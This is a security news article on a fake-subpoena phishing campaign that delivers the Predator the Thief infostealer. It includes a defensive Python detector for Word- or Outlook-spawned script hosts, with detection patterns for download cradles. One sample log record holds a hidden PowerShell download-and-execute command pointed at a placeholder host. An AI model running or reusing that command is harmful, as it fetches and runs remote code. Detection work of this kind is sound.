Fake court subpoenas used to spread phishing malware

Cofense, a cybersecurity company, discovered a new phishing campaign that targets users with emails about a subpoena, purportedly sent by the UK Department of Justice, with the ultimate goal of infecting their systems with information-stealing malware.

Employees of insurance companies and retailers received these phishing emails, which state that the recipient has been subpoenaed and must click a link in the email to get more details about their case.

The link abuses trusted services, including Google Docs and Microsoft OneDrive, as stages of the infection chain. Although the Google Docs link itself is not malicious, it starts a redirect chain that ultimately leads to a macro-laden Microsoft Word file. Once the macro is executed, it downloads a sample of the Predator the Thief malware via PowerShell.
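The stage of that chain that is easiest to catch on the endpoint is a Word process starting PowerShell: legitimate documents almost never do that, so process-creation telemetry (Sysmon Event ID 1 or equivalent EDR events) can flag it regardless of which malware is downloaded. The following Python is an added example, not code from Cofense or the original article. It scores constructed process-creation records (the `Key=Value|Key=Value` log format, the file paths, the `CORP\jdoe` user and the `stage.example.invalid` URL are all invented for the example) and alerts when an Office parent spawns a script host, raising the score further when the PowerShell command line carries download-cradle or hidden-window switches.

```python
import re
from dataclasses import dataclass

# Office parents and script hosts that commonly appear in macro-launched chains.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Command-line fragments typical of download cradles and evasion switches.
# They only add severity; on their own they are too noisy to alert on.
CRADLE_PATTERNS = {
    "download cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "encoded command": re.compile(
        r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}
ALERT_THRESHOLD = 70


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line: str) -> ProcessEvent:
    """Parse one 'Key=Value|Key=Value' record (a constructed format, not real
    Sysmon output; a production parser would read the EVTX/XML fields)."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")   # split on the first '=' only
        fields[key.strip()] = value.strip()
    return ProcessEvent(fields["ParentImage"], fields["Image"],
                        fields.get("CommandLine", ""), fields.get("User", ""))


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return a numeric score and the human-readable reasons behind it."""
    score, reasons = 0, []
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        score += 70
        reasons.append(f"{parent} spawned script host {child}")
    if child in {"powershell.exe", "pwsh.exe"}:
        for name, pattern in CRADLE_PATTERNS.items():
            if pattern.search(ev.command_line):
                score += 15
                reasons.append(f"{name} in command line")
    return score, reasons


def detect(lines, threshold: int = ALERT_THRESHOLD):
    """Return (record number, score, reasons) for every record at or above threshold."""
    alerts = []
    for number, line in enumerate(lines, 1):
        score, reasons = score_event(parse_event(line))
        if score >= threshold:
            alerts.append((number, score, reasons))
    return alerts


# Constructed sample telemetry (hypothetical hosts, users and URL).
SAMPLE_EVENTS = [
    # 1: macro-launched PowerShell download cradle, the pattern described above
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -w hidden -nop -c IEX((New-Object Net.WebClient)"
    r".DownloadString('http://stage.example.invalid/p'))|User=CORP\jdoe",
    # 2: benign admin script launched from Explorer
    r"ParentImage=C:\Windows\explorer.exe"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -File C:\Scripts\backup.ps1|User=CORP\admin",
    # 3: Word printing, a benign Office child process
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|Image=C:\Windows\splwow64.exe|CommandLine=C:\Windows\splwow64.exe 12288"
    r"|User=CORP\jdoe",
    # 4: Outlook spawning cmd.exe with no cradle, still worth an alert
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
    r"|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c dir|User=CORP\jdoe",
]

if __name__ == "__main__":
    for number, score, reasons in detect(SAMPLE_EVENTS):
        print(f"record {number}: score {score}: {'; '.join(reasons)}")
```

Records 1 and 4 alert (scores 100 and 70); the Explorer-launched script and the print helper score 0. Keeping the cradle keywords as severity modifiers rather than triggers is deliberate: administrators use `DownloadString` legitimately, but an Office parent does not, so the parent-child relationship is the high-confidence signal and the command line just ranks the alert.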

The initial email also warns that the recipient has 14 days to comply with the subpoena notice, a scare tactic designed to pressure users into clicking the link in the message.

Predator the Thief

Predator the Thief has all the basic features of most information stealers. One of its distinguishing traits, however, is the wide range of web browsers it targets, which means that even users of a less popular web browser could be affected.

The malware's authors use a Telegram channel to distribute their product; the same channel also serves as a customer support channel.

Predator the Thief targets cryptocurrency wallets, browser information, FTP credentials, and email. The malware also takes a screenshot of the infected machine, and all of this data is sent back to a command and control (C2) server via an HTTP POST.

Once the target information has been collected and sent to the C2 server, the binary cleans up parts of the infection and terminates itself, which makes the malware much harder to discover.

To avoid falling victim to this latest phishing campaign, Cofense recommends disabling Microsoft Office macros by default and using endpoint protection.